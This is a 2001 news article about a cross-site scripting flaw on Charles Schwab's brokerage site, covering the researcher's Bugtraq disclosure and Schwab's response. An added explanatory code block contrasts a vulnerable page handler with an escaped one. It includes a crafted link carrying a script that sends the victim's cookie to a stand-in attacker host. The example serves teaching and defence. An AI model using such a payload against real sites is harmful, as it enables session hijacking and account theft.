Schwab's site could be vulnerable

Industry Standard

(IDG) -- Charles Schwab's online customers are at risk of having their account information read and their accounts manipulated because of the same class of Web application flaw that was found on E-Trade's Web site in September.

Both online brokers are highly susceptible to so-called cross-site scripting, a common flaw in Web-based applications in which a site echoes attacker-supplied text (typically carried in a link) back into one of its own pages without filtering it. The victim's browser then runs the attacker's script as if it came from the trusted site, with access to that site's cookies and the ability to issue requests in the victim's name.


In the Schwab case, an attacker could use JavaScript to take control of another Schwab customer's account while that customer is logged on, including retrieving the cookie that Schwab uses to authenticate the user, according to Jeffrey W. Baker, who posted the vulnerability to the Bugtraq security mailing list Monday. With that cookie in hand, the attacker can use the session as the customer.

"The attacker can choose to either gain interactive use of the service, or to cause the account holder to perform inadvertent unwanted actions on the attacker's behalf," Baker writes.


Schwab customers can be exposed merely by clicking on a link on a Web page, on an image embedded in an e-mail, or on a message on a stock trading bulletin board: the attacker's script travels inside the link, and the Schwab site reflects it back into a page that the customer's browser trusts.
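The mechanism described above, as an added example that is not code from the article, from Schwab or from E-Trade: a minimal server-side page handler that echoes a query parameter into HTML. The vulnerable version inserts the value raw, so a crafted link that carries a cookie-stealing script is reflected into the page and would run in the victim's browser; the hardened version HTML-escapes the value first. The function names, the `symbol` parameter, and the hosts `broker.invalid` and `attacker.invalid` are illustrative assumptions.

```javascript
// Added example (not the article's or any brokerage's code): reflected
// cross-site scripting, vulnerable vs. hardened. Assumed names throughout.

// Escape the five characters that can change HTML context.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Decode the query string of a request URL into a plain object.
function parseQuery(url) {
  const params = new URL(url, "https://example.invalid").searchParams;
  const out = {};
  for (const [k, v] of params) out[k] = v;
  return out;
}

// VULNERABLE: the untrusted "symbol" parameter is reflected verbatim.
function renderVulnerable(url) {
  const { symbol = "" } = parseQuery(url);
  return `<html><body><h1>Quote for ${symbol}</h1></body></html>`;
}

// HARDENED: same page, but the value is escaped for HTML body context,
// so "<script>" arrives in the browser as literal text, not markup.
function renderHardened(url) {
  const { symbol = "" } = parseQuery(url);
  return `<html><body><h1>Quote for ${escapeHtml(symbol)}</h1></body></html>`;
}

// Small check used below: does the rendered page contain a live <script> tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed attacker link. When the reflected script runs in the victim's
// browser it ships the site's cookie to the attacker's host; the same
// foothold could instead issue requests (trades, transfers) as the victim.
const payload =
  "<script>document.location='http://attacker.invalid/?c='+document.cookie</script>";
const craftedLink =
  "https://broker.invalid/quote?symbol=" + encodeURIComponent(payload);

console.log("vulnerable page:", renderVulnerable(craftedLink));
console.log("hardened page:  ", renderHardened(craftedLink));
```

The escaping has to match the output context: the body-text escape above is not sufficient if the value is placed inside a JavaScript block or an unquoted attribute, which is why the fix belongs in the page-generation code rather than in the customer's browser settings.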

Baker was critical of the way Schwab has handled -- or rather not handled, in his opinion -- the problem. He said he discovered the security flaws in August and that despite having discussions with Schwab staff about them from Aug. 25 to Aug. 28, the problem has not been resolved.

"As an organization, Schwab should strive to fix problems when given five-month advance notice," he writes. "They should raise their ethical standards to alert their paying customers whenever a system vulnerability is reported."

Elias Levy, CTO of the SecurityFocus.com portal and moderator of the Bugtraq mailing list, says the vulnerability is the result of poor programming practices.

Schwab spokesman John Sommerfield said the brokerage has taken "intermediate" steps to correct the problem, though he declined to specify what those steps are. The company will have a complete fix for the problem by the end of the year, he says, adding that no incidents have been reported and that the risk is "relatively minimal" for customers.

"In order for someone to attack you as a Schwab customer, the hacker must know you're a customer and [that you are] logged on," Sommerfield says. "Also, the hacker must know the customer's e-mail address."

Baker recommends that Schwab customers disable JavaScript in their browsers and that they not visit any other Web sites, read e-mail or use bulletin boards while using Schwab's Web site. He also warns that Schwab customers should log off the Schwab site when they are finished using it, and always close and restart their browser before and after using the Web site.

In September, Baker reported on Bugtraq the same scripting problem at E-Trade, in hopes of spurring the brokerage to take action. A call to an E-Trade spokeswoman to find out if the cross-site scripting vulnerability has been fixed was not immediately returned Wednesday evening.

The cross-site scripting problem first came to light in February when experts at CERT, the Computer Emergency Response Team at Carnegie Mellon University, released an advisory. In general, Web users are advised not to open e-mail messages or click on Web links that aren't from trusted sources.

© 2001 Cable News Network. All Rights Reserved.